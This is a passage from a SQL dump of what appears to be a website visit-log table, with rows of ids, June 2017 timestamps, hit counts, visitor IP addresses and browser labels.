132.76','other'),(120778,1497306026,1,1,0,0,'164.132.161.39','other'),(120779,1497306211,1,1,0,0,'217.182.132.85','other'),(120780,1497306491,1,1,0,0,'137.74.207.170','other'),(120781,1497306637,1,0,1,0,'66.249.76.107',''),(120782,1497306871,1,1,0,0,'164.132.161.78','other'),(120783,1497307222,1,1,0,0,'164.132.161.48','other'),(120784,1497307247,1,1,0,0,'164.132.161.42','other'),(120785,1497307800,1,1,0,0,'164.132.161.79','other'),(120786,1497307847,1,1,0,0,'46.48.13.161','chrome'),(120787,1497308159,1,1,0,0,'217.182.132.148','other'),(120788,1497308160,1,1,0,0,'51.255.65.22','other'),(120789,1497308298,1,1,0,0,'66.249.76.108','chrome'),(120790,1497308348,1,1,0,0,'5.196.87.173','other'),(120791,1497308980,1,1,0,0,'51.255.65.91','other'),(120792,1497309161,1,1,0,0,'137.74.207.116','other'),(120793,1497309453,1,1,0,0,'164.132.161.8','other'),(120794,1497309550,1,1,0,0,'164.132.162.160','other'),(120795,1497309875,1,1,0,0,'51.255.71.129','other'),(120796,1497310136,1,0,1,0,'66.249.76.93',''),(120797,1497310479,1,1,0,0,'8.29.198.26','other'),(120798,1497310520,1,1,0,0,'164.132.161.31','other'),(120799,1497310578,1,1,0,0,'217.182.132.96','other'),(120800,1497311150,1,0,1,0,'66.249.76.107',''),(120801,1497311171,1,1,0,0,'164.132.161.71','other'),(120802,1497311172,1,1,0,0,'217.182.132.241','other'),(120803,1497312034,1,1,0,0,'164.132.162.158','other'),(120804,1497312047,1,1,0,0,'217.182.132.76','other'),(120805,1497312567,1,1,0,0,'164.132.162.157','other'),(120806,1497313374,1,1,0,0,'164.132.161.21','other'),(120807,1497313462,1,1,0,0,'217.182.132.241','other'),(120808,1497313538,1,1,0,0,'51.255.65.93','other'),(120809,1497313540,1,1,0,0,'164.132.161.29','other'),(120810,1497313586,1,0,1,0,'66.249.76.109',''),(120811,1497314083,1,1,0,0,'51.255.65.35','other'),(120812,1497314255,1,1,0,0,'164.132.162.187','other'),(120813,1497314412,1,1,0,0,'180.76.15.25','other'),(120814,1497314827,1,1,0,0,'51.255.65.33','other'),(120815,1497315107,1,1,0,0,'217.182.132.240','other'),(120816,1497316318,1,1,0,0,'137.74.207.170','other'),(120817,1497316987,1,1,0,0,'217.182.132.56','other'),(120818,1497317017,1,0,1,0,'66.249.66.199',''),(120819,1497317233,1,0,1,0,'66.249.76.108',''),(120820,1497317250,1,1,0,0,'5.196.87.173','other'),(120821,1497317407,1,1,0,0,'51.255.71.133','other'),(120822,1497317687,1,1,0,0,'51.255.65.68','other'),(120823,1497318055,1,1,0,0,'164.132.161.19','other'),(120824,1497318084,1,1,0,0,'164.132.161.59','other'),(120825,1497318541,2,2,0,0,'69.30.243.58','msie'),(120826,1497318882,1,1,0,0,'217.182.132.24','other'),(120827,1497319117,1,0,1,0,'66.249.76.109',''),(120828,1497319168,1,1,0,0,'51.255.65.28','other'),(120829,1497319496,1,1,0,0,'217.182.132.72','other'),(120830,1497319527,1,0,1,0,'66.249.76.93',''),(120831,1497319548,1,0,1,0,'66.249.76.91',''),(120832,1497319555,1,0,1,0,'66.249.76.89',''),(120833,1497319806,1,1,0,0,'164.132.161.45','other'),(120834,1497320373,1,1,0,0,'164.132.161.53','other'),(120835,1497320491,1,1,0,0,'164.132.161.79','other'),(120836,1497320505,1,0,1,0,'66.249.76.93',''),(120837,1497320528,1,1,0,0,'164.132.161.30','other'),(120838,1497321175,1,1,0,0,'217.182.132.71','other'),(120839,1497321315,1,1,0,0,'8.29.198.25','other'),(120840,1497321534,1,0,1,0,'66.249.76.93',''),(120841,1497321875,1,1,0,0,'51.255.65.35','other'),(120842,1497321886,1,1,0,0,'164.132.161.5','other'),(120843,1497321913,1,1,0,0,'217.182.132.51','other'),(120844,1497321952,1,1,0,0,'144.76.8.66','other'),(120845,1497322350,1,1,0,0,'216.244.66.237','other'),(120846,1497322406,1,0,1,0,'66.249.76.89',''),(120847,1497322504,1,1,0,0,'164.132.161.72','other'),(120848,1497322678,1,1,0,0,'217.182.132.70','other'),(120849,1497322766,1,0,1,0,'66.249.66.157',''),(120850,1497323653,1,1,0,0,'51.255.65.87','other'),(120851,1497323672,1,1,0,0,'137.74.201.108','other'),(120852,1497323840,1,0,1,0,'68.180.230.48',''),(120853,1497323900,1,1,0,0,'180.76.15.141','other'),(120854,1497324328,1,1,0,0,'164.132.161.22','other'),(120855,1497324358,1,1,0,0,'95.108.181.22','other'),(120856,1497324459,1,1,0,0,'51.255.71.101','other'),(120857,1497324680,1,0,1,0,'66.249.76.107',''),(120858,1497325071,1,1,0,0,'164.132.162.164','other'),(120859,1497325207,1,1,0,0,'66.249.76.108','chrome'),(120860,1497325363,1,1,0,0,'217.182.132.83','other'),(120861,1497325993,1,0,1,0,'68.180.230.48',''),(120862,1497326479,1,1,0,0,'66.249.76.91','chrome'),(120863,1497326493,1,0,1,0,'66.249.66.157',''),(120864,1497326906,1,1,0,0,'51.255.65.55','other'),(120865,1497326931,1,0,1,0,'66.249.76.89',''),(120866,1497327097,1,1,0,0,'217.182.132.67','other'),(120867,1497327205,1,1,0,0,'5.196.87.171','other'),(120868,1497327208,1,1,0,0,'217.182.132.68','other'),(120869,1497327460,1,1,0,0,'164.132.161.68','other'),(120870,1497327931,1,1,0,0,'5.196.87.173','other'),(120871,1497328075,1,1,0,0,'217.182.132.151','other'),(120872,1497328391,1,0,1,0,'66.249.76.91',''),(120873,1497328662,1,1,0,0,'91.196.178.72','firefox'),(120874,1497328678,1,1,0,0,'91.196.178.35','chrome'),(120875,1497329558,1,1,0,0,'164.132.161.29','other'),(120876,1497329666,1,0,1,0,'66.249.76.108',''),(120877,1497329845,1,0,1,0,'66.249.66.195',''),(120878,1497329963,1,1,0,0,'51.255.65.46','other'),(120879,1497330117,1,0,1,0,'66.249.66.157',''),(120880,1497330158,2,2,0,0,'40.77.167.101','other'),(120881,1497330308,1,1,0,0,'217.182.132.55','other'),(120882,1497330442,1,1,0,0,'217.182.132.70','other'),(120883,1497330491,1,1,0,0,'157.55.39.178','other'),(120884,1497330547,1,1,0,0,'217.182.132.59','other'),(120885,1497330672,1,0,1,0,'68.180.230.48',''),(120886,1497330726,1,0,1,0,'66.249.76.93',''),(120887,1497330866,1,0,1,0,'66.249.76.108',''),(120888,1497331600,1,0,1,0,'66.249.76.107',''),(120889,1497331610,1,1,0,0,'91.124.199.100','chrome'),(120890,1497331981,1,0,1,0,'68.180.230.48',''),(120891,1497332122,1,1,0,0,'217.182.132.14','other'),(120892,1497332152,1,1,0,0,'8.29.198.25','other'),(120893,1497332247,1,1,0,0,'137.74.207.110','other'),(120894,1497332303,1,1,0,0,'164.132.161.26','other'),(120895,1497332590,1,1,0,0,'164.132.161.60','other'),(120896,1497332717,1,1,0,0,'164.132.161.6','other'),(120897,1497332797,1,1,0,0,'51.255.71.133','other'),(120898,1497332872,1,1,0,0,'91.196.177.44','chrome'),(120899,1497333383,1,0,1,0,'66.249.76.91',''),(120900,1497333572,1,1,0,0,'92.113.59.91','chrome'),(120901,1497333686,1,1,0,0,'5.196.87.175','other'),(120902,1497333692,1,1,0,0,'51.255.71.115','other'),(120903,1497333979,1,0,1,0,'66.249.66.158',''),(120904,1497334101,1,1,0,0,'51.255.65.58','other'),(120905,1497334169,1,1,0,0,'85.115.58.180','other'),(120906,1497334422,1,1,0,0,'137.74.207.109','other'),(120907,1497334469,1,0,1,0,'66.249.76.107',''),(120908,1497334726,1,1,0,0,'164.132.161.43','other'),(120909,1497334801,1,0,1,0,'66.249.66.157',''),(120910,1497335298,1,0,1,0,'66.249.76.89',''),(120911,1497335304,1,1,0,0,'66.249.66.156','chrome'),(120912,1497335508,1,1,0,0,'91.196.177.26','chrome'),(120913,1497335850,1,1,0,0,'213.111.232.154','chrome'),(120914,1497336278,1,0,1,0,'66.249.66.195',''),(120915,1497336348,1,1,0,0,'164.132.161.30','other'),(120916,1497336372,1,1,0,0,'92.112.109.230','chrome'),(120917,1497336384,1,0,1,0,'66.249.66.158',''),(120918,1497336573,1,1,0,0,'164.132.161.56','other'),(120919,1497336666,1,1,0,0,'217.182.132.30','other'),(120920,1497336841,1,1,0,0,'51.255.71.121','other'),(120921,1497336933,1,1,0,0,'51.255.65.43','other'),(120922,1497336955,1,1,0,0,'5.196.87.174','other'),(120923,1497337067,1,0,1,0,'66.249.76.89',''),(120924,1497337549,1,1,0,0,'51.255.65.38','other'),(120925,1497337683,1,1,0,0,'217.182.132.73','other'),(120926,1497337729,1,1,0,0,'217.182.132.59','other'),(120927,1497337741,1,1,0,0,'137.74.207.109','other'),(120928,1497337766,1,1,0,0,'95.132.116.126','firefox'),(120929,1497338140,1,1,0,0,'217.182.132.37','other'),(120930,1497338320,1,0,1,0,'66.249.66.158',''),(120931,1497338387,1,1,0,0,'164.132.161.90','other'),(120932,1497338529,1,1,0,0,'164.132.161.93','other'),(120933,1497338755,1,1,0,0,'185.137.18.132','chrome'),(120934,1497338874,1,1,0,0,'51.255.71.125','other'),(120935,1497339336,1,1,0,0,'164.132.162.157','other'),(120936,1497339369,1,1,0,0,'91.224.68.236','chrome'),(120937,1497340203,1,1,0,0,'91.196.177.26','chrome'),(120938,1497340641,1,1,0,0,'5.196.87.172','other'),(120939,1497340810,1,1,0,0,'164.132.161.33','other'),(120940,1497340948,1,1,0,0,'46.48.13.161','chrome'),(120941,1497341059,1,1,0,0,'217.182.132.25','other'),(120942,1497341572,1,1,0,0,'137.74.201.99','other'),(120943,1497341763,1,0,1,0,'68.180.230.48',''),(120944,1497342108,1,1,0,0,'217.182.132.21','other'),(120945,1497342176,1,1,0,0,'180.76.15.30','other'),(120946,1497342443,1,1,0,0,'91.196.178.68','chrome'),(120947,1497342463,1,1,0,0,'164.132.161.53','other'),(120948,1497342530,1,0,1,0,'66.249.76.107',''),(120949,1497343020,1,1,0,0,'8.29.198.27','other'),(120950,1497343212,1,1,0,0,'51.255.65.89','other'),(120951,1497343357,1,1,0,0,'217.182.132.35','other'),(120952,1497343411,1,0,1,0,'66.249.66.195',''),(120953,1497343861,1,0,1,0,'66.249.66.199',''),(120954,1497344048,1,1,0,0,'178.151.4.133','chrome'),(120955,1497344303,2,2,0,0,'92.112.32.72','firefox'),(120956,1497344319,1,1,0,0,'164.132.161.73','other'),(120957,1497344429,1,1,0,0,'51.255.65.95','other'),(120958,1497344667,1,1,0,0,'46.133.246.28','firefox'),(120959,1497344897,1,1,0,0,'137.74.201.108','other'),(120960,1497345043,1,1,0,0,'5.196.87.174','other'),(120961,1497345432,1,1,0,0,'164.132.161.38','other'),(120962,1497345471,1,0,1,0,'68.180.230.48',''),(120963,1497345787,2,0,2,0,'66.249.76.93',''),(120964,1497345933,1,1,0,0,'164.132.161.11','other'),(120965,1497346353,1,1,0,0,'164.132.161.12','other'),(120966,1497346496,1,1,0,0,'91.196.178.68','chrome'),(120967,1497346519,1,1,0,0,'151.80.27.118','other'),(120968,1497346919,1,1,0,0,'51.255.65.34','other'),(120969,1497347094,1,1,0,0,'217.182.132.82','other'),(120970,1497347304,1,1,0,0,'5.9.88.103','other'),(120971,1497348321,1,0,1,0,'66.249.76.107',''),(120972,1497348389,1,1,0,0,'164.132.161.36','other'),(120973,1497348501,1,1,0,0,'178.92.151.189','chrome'),(120974,1497348572,1,1,0,0,'37.55.226.30','chrome'),(120975,1497348712,1,1,0,0,'216.244.66.237','other'),(120976,1497349080,1,1,0,0,'217.182.132.67','other'),(120977,1497349101,1,1,0,0,'66.102.9.25','chrome'),(120978,1497349511,1,1,0,0,'217.182.132.56','other'),(120979,1497349514,1,1,0,0,'164.132.162.187','other'),(120980,1497349648,1,1,0,0,'164.132.161.29','other'),(120981,1497349887,1,1,0,0,'5.196.87.171','other'),(120982,1497349965,1,1,0,0,'91.196.178.65','firefox'),(120983,1497350585,1,1,0,0,'37.73.191.138','other'),(120984,1497351069,1,1,0,0,'51.255.65.60','other'),(120985,1497351161,1,1,0,0,'51.255.71.133','other'),(120986,1497351477,1,1,0,0,'164.132.161.77','other'),(120987,1497351498,1,0,1,0,'66.249.66.157',''),(120988,1497351895,1,1,0,0,'217.69.133.85','other'),(120989,1497352248,1,1,0,0,'66.249.76.107','chrome'),(120990,1497352578,1,1,0,0,'217.182.132.84','other'),(120991,1497352983,1,1,0,0,'95.134.0.240','chrome'),(120992,1497353000,1,1,0,0,'5.255.253.54','other'),(120993,1497353160,1,0,1,0,'68.180.230.48',''),(120994,1497353277,1,1,0,0,'216.244.66.237','other'),(120995,1497353293,1,0,1,0,'66.249.76.91',''),(120996,1497353488,1,1,0,0,'164.132.161.23','other'),(120997,1497353865,1,1,0,0,'8.29.198.25','other'),(120998,1497353933,1,1,0,0,'91.196.178.165','chrome'),(120999,1497353984,1,1,0,0,'5.196.87.171','other'),(121000,1497354109,1,0,1,0,'66.249.76.93',''),(121001,1497354164,1,1,0,0,'217.182.132.151','other'),(121002,1497354234,1,0,1,0,'66.249.76.109',''),(121003,1497354655,1,1,0,0,'51.255.65.67','other'),(121004,1497354830,1,1,0,0,'137.74.207.164','other'),(121005,1497355092,1,0,1,0,'66.249.66.201',''),(121006,1497355158,1,1,0,0,'91.196.177.46','firefox'),(121007,1497355916,1,1,0,0,'217.182.132.66','other'),(121008,1497355961,1,1,0,0,'5.255.253.54','other'),(121009,1497356189,1,1,0,0,'217.182.132.175','other'),(121010,1497356464,1,1,0,0,'164.132.161.28','other'),(121011,1497356534,1,1,0,0,'217.182.132.176','other'),(121012,1497356757,1,1,0,0,'178.92.170.202','chrome'),(121013,1497356776,1,1,0,0,'5.165.238.212','firefox'),(121014,1497356948,1,1,0,0,'164.132.162.153','other'),(121015,1497357241,1,1,0,0,'91.196.177.46','firefox'),(121016,1497358015,1,1,0,0,'217.182.132.61','other'),(121017,1497358135,1,1,0,0,'217.182.132.187','other'),(121018,1497358249,1,1,0,0,'5.196.87.174','other'),(121019,1497358404,1,1,0,0,'164.132.161.62','other'),(121020,1497358446,1,1,0,0,'46.200.188.147','chrome'),(121021,1497358818,1,1,0,0,'164.132.161.11','other'),(121022,1497358864,1,1,0,0,'130.180.211.204','chrome'),(121023,1497359009,1,1,0,0,'137.74.201.108','other'),(121024,1497359283,1,1,0,0,'195.49.151.89','chrome'),(121025,1497359290,1,1,0,0,'5.255.253.54','other'),(121026,1497359374,1,1,0,0,'51.255.65.50','other'),(121027,1497359376,1,1,0,0,'5.189.151.240','other'),(121028,1497359488,1,1,0,0,'217.182.132.187','other'),(121029,1497359671,1,1,0,0,'5.196.87.171','other'),(121030,1497359944,1,1,0,0,'91.196.177.46','firefox'),(121031,1497360463,1,1,0,0,'217.69.133.194','other'),(121032,1497360643,1,1,0,0,'164.132.161.95','other'),(121033,1497360647,1,1,0,0,'188.247.97.132','firefox'),(121034,1497360916,1,1,0,0,'91.196.177.46','firefox'),(121035,1497361192,1,1,0,0,'164.132.161.87','other'),(121036,1497361258,1,1,0,0,'217.182.132.15','other'),(121037,1497361300,1,1,0,0,'164.132.162.153','other'),(121038,1497361411,1,0,1,0,'66.249.76.93',''),(121039,1497361464,1,1,0,0,'178.154.200.42','other'),(121040,1497361583,1,0,1,0,'66.249.76.109',''),(121041,1497361594,1,1,0,0,'217.182.132.185','other'),(121042,1497361623,1,0,1,0,'66.249.66.201',''),(121043,1497361881,2,2,0,0,'78.111.185.97','chrome'),(121044,1497361914,1,1,0,0,'51.255.65.44','other'),(121045,1497362078,1,1,0,0,'91.196.178.165','chrome'),(121046,1497362218,1,1,0,0,'46.164.137.51','chrome'),(121047,1497362228,1,1,0,0,'217.182.132.155','other'),(121048,1497362523,1,1,0,0,'51.255.71.127','other'),(121049,1497362714,1,0,1,0,'66.249.66.156',''),(121050,1497362905,1,1,0,0,'40.77.167.45','other'),(121051,1497363042,1,1,0,0,'5.196.87.175','other'),(121052,1497363056,1,1,0,0,'85.115.58.180','other'),(121053,1497363098,1,1,0,0,'95.133.153.30','chrome'),(121054,1497363858,1,1,0,0,'137.74.207.120','other'),(121055,1497363976,1,1,0,0,'178.54.192.35','chrome'),(121056,1497364072,1,1,0,0,'51.255.65.77','other'),(121057,1497364429,1,1,0,0,'217.182.132.6','other'),(121058,1497364464,1,1,0,0,'217.182.132.52','other'),(121059,1497364698,1,1,0,0,'8.29.198.25','other'),(121060,1497365438,1,1,0,0,'216.244.66.237','other'),(121061,1497365875,1,0,1,0,'66.249.76.109',''),(121062,1497365901,1,1,0,0,'217.182.132.193','other'),(121063,1497366259,1,1,0,0,'51.255.71.122','other'),(121064,1497366841,1,1,0,0,'5.196.87.175','other'),(121065,1497366930,1,1,0,0,'82.145.220.103','chrome'),(121066,1497367251,1,1,0,0,'217.182.132.66','other'),(121067,1497367259,1,1,0,0,'217.182.132.78','other'),(121068,1497367489,1,1,0,0,'91.196.178.34','chrome'),(121069,1497367681,1,1,0,0,'217.182.132.193','other'),(121070,1497367707,1,1,0,0,'5.165.238.212','chrome'),(121071,1497367842,1,1,0,0,'5.255.253.54','other'),(121072,1497368482,1,1,0,0,'164.132.161.75','other'),(121073,1497368691,1,1,0,0,'164.132.161.60','other'),(121074,1497368765,1,0,1,0,'66.249.66.156',''),(121075,1497369398,1,1,0,0,'151.80.27.118','other'),(121076,1497370092,1,1,0,0,'178.93.152.82','chrome'),(121077,1497370287,1,0,1,0,'66.249.76.89',''),(121078,1497370288,1,1,0,0,'164.132.161.18','other'),(121079,1497370462,1,0,1,0,'66.249.66.199',''),(121080,1497370469,1,1,0,0,'5.196.87.175','other'),(121081,1497370641,1,1,0,0,'185.53.79.49','chrome'),(121082,1497371106,1,1,0,0,'51.255.65.32','other'),(121083,1497371265,1,1,0,0,'91.196.178.102','firefox'),(121084,1497371591,1,1,0,0,'51.255.71.128','other'),(121085,1497371785,1,1,0,0,'51.255.65.41','other'),(121086,1497371915,1,1,0,0,'51.255.71.101','other'),(121087,1497372191,1,1,0,0,'5.196.87.172','other'),(121088,1497372379,1,1,0,0,'137.74.207.109','other'),(121089,1497372385,1,0,1,0,'68.180.230.48',''),(121090,1497373304,1,1,0,0,'37.55.28.73','chrome'),(121091,1497373377,1,1,0,0,'94.232.211.182','chrome'),(121092,1497373627,1,1,0,0,'217.182.132.79','other'),(121093,1497374132,1,1,0,0,'51.255.65.5','other'),(121094,1497374717,1,1,0,0,'5.196.87.172','other'),(121095,1497374795,1,1,0,0,'82.145.220.168','chrome'),(121096,1497374847,1,1,0,0,'95.135.158.247','firefox'),(121097,1497374862,1,1,0,0,'37.9.113.11','other'),(121098,1497374897,1,1,0,0,'5.255.253.54','other'),(121099,1497375081,1,1,0,0,'217.182.132.240','other'),(121100,1497375083,1,1,0,0,'176.31.231.10','other'),(121101,1497375345,1,0,1,0,'66.249.76.91',''),(121102,1497375544,1,1,0,0,'8.29.198.26','other'),(121103,1497375734,1,1,0,0,'164.132.161.38','other'),(121104,1497375807,1,1,0,0,'51.255.65.19','other'),(121105,1497375823,1,1,0,0,'217.182.132.69','other'),(121106,1497375855,1,1,0,0,'164.132.162.155','other'),(121107,1497375861,1,1,0,0,'66.249.76.89','chrome'),(121108,1497375924,1,1,0,0,'164.132.161.81','other'),(121109,1497375938,1,1,0,0,'51.255.65.67','other'),(121110,1497375965,1,1,0,0,'91.196.178.71','firefox'),(121111,1497375998,1,1,0,0,'5.196.87.174','other'),(121112,1497376030,1,1,0,0,'137.74.201.100','other'),(121113,1497376167,1,1,0,0,'51.255.71.129','other'),(121114,1497376206,1,1,0,0,'51.255.65.92','other'),(121115,1497376651,1,1,0,0,'51.255.65.77','other'),(121116,1497376758,1,1,0,0,'51.255.65.65','other'),(121117,1497376849,1,1,0,0,'217.182.132.57','other'),(121118,1497376890,1,1,0,0,'51.255.65.31','other'),(121119,1497377562,1,1,0,0,'51.255.65.29','other'),(121120,1497377854,1,1,0,0,'217.182.132.28','other'),(121121,1497378750,1,1,0,0,'164.132.161.36','other'),(121122,1497379466,1,1,0,0,'5.196.87.171','other'),(121123,1497379594,1,1,0,0,'91.196.178.162','chrome'),(121124,1497379885,1,1,0,0,'217.69.133.4','other'),(121125,1497379893,1,1,0,0,'51.255.65.34','other'),(121126,1497379894,1,1,0,0,'217.69.133.203','other'),(121127,1497379992,1,0,1,0,'68.180.230.48',''),(121128,1497380009,2,0,2,0,'66.249.66.158',''),(121129,1497380176,1,1,0,0,'217.182.132.176','other'),(121130,1497380438,1,1,0,0,'217.182.132.32','other'),(121131,1497380668,1,1,0,0,'51.255.65.28','other'),(121132,1497380701,1,1,0,0,'180.76.15.27','other'),(121133,1497381002,1,0,1,0,'66.249.76.89',''),(121134,1497382139,1,0,1,0,'66.249.76.91',''),(121135,1497382311,1,1,0,0,'217.182.132.193','other'),(121136,1497382447,1,1,0,0,'51.255.65.76','other'),(121137,1497382498,1,1,0,0,'164.132.161.43','other'),(121138,1497382531,1,1,0,0,'217.182.132.61','other'),(121139,1497382553,1,1,0,0,'137.74.207.159','other'),(121140,1497382790,1,1,0,0,'51.255.65.58','other'),(121141,1497383002,1,1,0,0,'51.255.71.126','other'),(121142,1497383036,1,0,1,0,'66.249.66.156',''),(121143,1497383116,1,1,0,0,'5.196.87.174','other'),(121144,1497383261,1,0,1,0,'66.249.66.201',''),(121145,1497383380,1,0,1,0,'68.180.230.48',''),(121146,1497384335,1,1,0,0,'51.255.71.111','other'),(121147,1497384616,1,0,1,0,'66.249.76.93',''),(121148,1497384741,1,1,0,0,'164.132.161.21','other'),(121149,1497384897,1,1,0,0,'217.69.133.4','other'),(121150,1497385027,1,1,0,0,'217.182.132.187','other'),(121151,1497385197,1,1,0,0,'164.132.161.37','other'),(121152,1497385277,1,1,0,0,'141.8.142.74','other'),(121153,1497385770,1,0,1,0,'66.249.66.158',''),(121154,1497386060,1,1,0,0,'217.182.132.180','other'),(121155,1497386103,1,1,0,0,'5.196.87.175','other'),(121156,1497386289,1,1,0,0,'164.132.161.37','other'),(121157,1497386382,1,1,0,0,'8.29.198.26','other'),(121158,1497386516,5,5,0,0,'5.189.150.231','other'),(121159,1497387035,1,1,0,0,'217.182.132.154','other'),(121160,1497387151,1,1,0,0,'54.208.102.37','other'),(121161,1497387399,1,1,0,0,'164.132.161.35','other'),(121162,1497387507,1,1,0,0,'217.182.132.27','other'),(121163,1497387779,1,1,0,0,'5.196.87.173','other'),(121164,1497388974,1,0,1,0,'66.249.76.109',''),(121165,1497389093,1,1,0,0,'217.182.132.76','other'),(121166,1497389138,1,1,0,0,'164.132.161.28','other'),(121167,1497389626,1,1,0,0,'164.132.161.49','other'),(121168,1497389840,1,1,0,0,'217.182.132.50','other'),(121169,1497389911,1,1,0,0,'5.196.87.172','other'),(121170,1497390375,1,1,0,0,'51.255.65.3','other'),(121171,1497390406,1,1,0,0,'141.8.132.47','other'),(121172,1497390546,8,8,0,0,'192.187.100.58','firefox'),(121173,1497390547,2,2,0,0,'192.187.100.58','msie'),(121174,1497391252,1,1,0,0,'5.196.87.174','other'),(121175,1497391902,1,1,0,0,'66.249.66.157','chrome'),(121176,1497392018,1,0,1,0,'66.249.76.93',''),(121177,1497392158,1,1,0,0,'51.255.65.64','other'),(121178,1497392192,1,0,1,0,'66.249.76.91',''),(121179,1497392320,1,1,0,0,'164.132.161.85','other'),(121180,1497393104,2,2,0,0,'51.255.65.14','other'),(121181,1497393700,1,1,0,0,'51.255.71.132','other'),(121182,1497393943,1,0,1,0,'66.249.76.109',''),(121183,1497393954,1,1,0,0,'137.74.203.194','other'),(121184,1497393993,1,1,0,0,'164.132.161.86','other'),(121185,1497394302,1,1,0,0,'164.132.161.46','other'),(121186,1497394340,1,1,0,0,'5.196.87.174','other'),(121187,1497394504,1,1,0,0,'217.182.132.184','other'),(121188,1497394880,1,1,0,0,'217.182.132.175','other'),(121189,1497394949,1,1,0,0,'164.132.161.27','other'),(121190,1497395067,1,1,0,0,'164.132.161.53','other'),(121191,1497395479,1,1,0,0,'217.182.132.53','other'),(121192,1497395576,1,1,0,0,'217.182.132.187','other'),(121193,1497395686,1,1,0,0,'51.255.65.72','other'),(121194,1497395848,1,1,0,0,'217.182.132.54','other'),(121195,1497396147,1,1,0,0,'217.182.132.172','other'),(121196,1497396224,1,0,1,0,'66.249.76.108',''),(121197,1497396235,1,1,0,0,'51.255.65.35','other'),(121198,1497396441,1,1,0,0,'217.69.133.194','other'),(121199,1497396711,1,1,0,0,'164.132.161.37','other'),(121200,1497396953,1,1,0,0,'66.249.76.89','chrome'),(121201,1497397214,1,1,0,0,'8.29.198.26','other'),(121202,1497397263,1,1,0,0,'137.74.201.108','other'),(121203,1497397652,1,1,0,0,'5.196.87.171','other'),(121204,1497397704,1,1,0,0,'164.132.161.67','other'),(121205,1497397947,1,0,1,0,'66.249.66.75',''),(121206,1497398170,1,1,0,0,'40.77.167.101','other'),(121207,1497398415,1,1,0,0,'137.74.201.100','other'),(121208,1497399131,1,1,0,0,'5.196.87.175','other'),(121209,1497399374,1,1,0,0,'51.255.65.26','other'),(121210,1497399426,1,1,0,0,'137.74.201.99','other'),(121211,1497399503,1,1,0,0,'164.132.162.158','other'),(121212,1497399606,1,1,0,0,'164.132.161.39','other'),(121213,1497400143,1,0,1,0,'66.249.66.74',''),(121214,1497400224,1,1,0,0,'51.255.65.18','other'),(121215,1497402024,1,1,0,0,'51.255.71.121','other'),(121216,1497402157,1,0,1,0,'66.249.76.107',''),(121217,1497402207,1,1,0,0,'5.196.87.173','other'),(121218,1497402897,1,0,1,0,'66.249.66.157',''),(121219,1497403231,1,1,0,0,'51.255.65.95','other'),(121220,1497403404,1,1,0,0,'137.74.207.164','other'),(121221,1497403418,1,1,0,0,'164.132.161.91','other'),(121222,1497403751,1,1,0,0,'164.132.161.44','other'),(121223,1497403786,1,1,0,0,'164.132.161.63','other'),(121224,1497403962,1,1,0,0,'164.132.161.38','other'),(121225,1497404486,1,1,0,0,'157.55.39.178','other'),(121226,1497404786,1,1,0,0,'5.196.87.173','other'),(121227,1497404955,1,0,1,0,'66.249.76.107',''),(121228,1497405102,1,1,0,0,'217.182.132.60','other'),(121229,1497405114,1,1,0,0,'164.132.161.13','other'),(121230,1497405201,1,1,0,0,'217.182.132.149','other'),(121231,1497405741,1,1,0,0,'164.132.161.76','other'),(121232,1497405906,1,1,0,0,'217.182.132.173','other'),(121233,1497405968,1,1,0,0,'164.132.161.32','other'),(121234,1497405981,1,1,0,0,'5.196.87.173','other'),(121235,1497406192,1,1,0,0,'137.74.207.114','other'),(121236,1497406351,1,1,0,0,'164.132.161.16','other'),(121237,1497406442,1,1,0,0,'51.255.71.112','other'),(121238,1497406574,1,1,0,0,'40.77.167.45','other'),(121239,1497407291,1,1,0,0,'51.255.65.9','other'),(121240,1497407625,1,1,0,0,'164.132.164.180','other'),(121241,1497407837,1,0,1,0,'68.180.230.48',''),(121242,1497408048,1,1,0,0,'8.29.198.27','other'),(121243,1497408343,1,1,0,0,'216.244.66.237','other'),(121244,1497408354,1,0,1,0,'66.249.76.89',''),(121245,1497408373,1,1,0,0,'217.182.132.77','other'),(121246,1497408407,1,1,0,0,'164.132.161.72','other'),(121247,1497408493,1,1,0,0,'217.182.132.35','other'),(121248,1497408596,1,1,0,0,'164.132.161.35','other'),(121249,1497408781,1,1,0,0,'137.74.207.119','other'),(121250,1497408846,1,1,0,0,'217.69.133.194','other'),(121251,1497408851,1,1,0,0,'5.196.87.175','other'),(121252,1497408897,1,1,0,0,'164.132.161.3','other'),(121253,1497408936,1,1,0,0,'164.132.161.56','other'),(121254,1497408958,1,1,0,0,'51.255.65.41','other'),(121255,1497409223,1,1,0,0,'157.55.39.183','other'),(121256,1497409458,1,1,0,0,'164.132.161.47','other'),(121257,1497409810,1,1,0,0,'164.132.161.80','other'),(121258,1497409963,1,1,0,0,'217.182.132.241','other'),(121259,1497410311,1,1,0,0,'164.132.161.28','other'),(121260,1497410682,1,1,0,0,'5.196.87.173','other'),(121261,1497411027,1,1,0,0,'164.132.161.94','other'),(121262,1497411143,1,0,1,0,'66.249.76.93',''),(121263,1497411528,1,1,0,0,'51.255.71.120','other'),(121264,1497411763,1,1,0,0,'66.249.66.157','chrome'),(121265,1497411880,1,1,0,0,'51.255.65.94','other'),(121266,1497411996,1,0,1,0,'68.180.230.48',''),(121267,1497412157,1,1,0,0,'178.154.200.42','other'),(121268,1497412489,2,1,1,0,'66.249.76.109',''),(121269,1497413143,1,1,0,0,'164.132.161.4','other'),(121270,1497413321,1,1,0,0,'151.80.27.116','other'),(121271,1497413629,1,1,0,0,'91.196.178.36','chrome'),(121272,1497413680,1,1,0,0,'217.69.133.2','other'),(121273,1497413835,1,1,0,0,'164.132.161.55','other'),(121274,1497414216,1,1,0,0,'164.132.161.12','other'),(121275,1497414432,1,1,0,0,'164.132.161.44','other'),(121276,1497414527,2,0,2,0,'66.249.76.91',''),(121277,1497414544,1,1,0,0,'217.182.132.27','other'),(121278,1497414937,1,1,0,0,'91.196.178.68','firefox'),(121279,1497415205,1,1,0,0,'164.132.161.70','other'),(121280,1497415350,1,0,1,0,'66.249.76.89',''),(121281,1497415422,1,0,1,0,'66.249.76.108',''),(121282,1497415553,1,1,0,0,'217.182.132.7','other'),(121283,1497415558,1,1,0,0,'164.132.161.82','other'),(121284,1497415733,1,1,0,0,'164.132.161.85','other'),(121285,1497415784,1,1,0,0,'164.132.161.77','other'),(121286,1497416606,1,1,0,0,'217.182.132.175','other'),(121287,1497416696,1,1,0,0,'51.255.71.122','other'),(121288,1497416952,1,1,0,0,'91.196.178.68','chrome'),(121289,1497417336,1,0,1,0,'66.249.76.108',''),(121290,1497417463,1,1,0,0,'91.196.177.44','chrome'),(121291,1497417479,1,1,0,0,'91.196.178.68','firefox'),(121292,1497417929,1,1,0,0,'180.76.15.7','other'),(121293,1497418186,1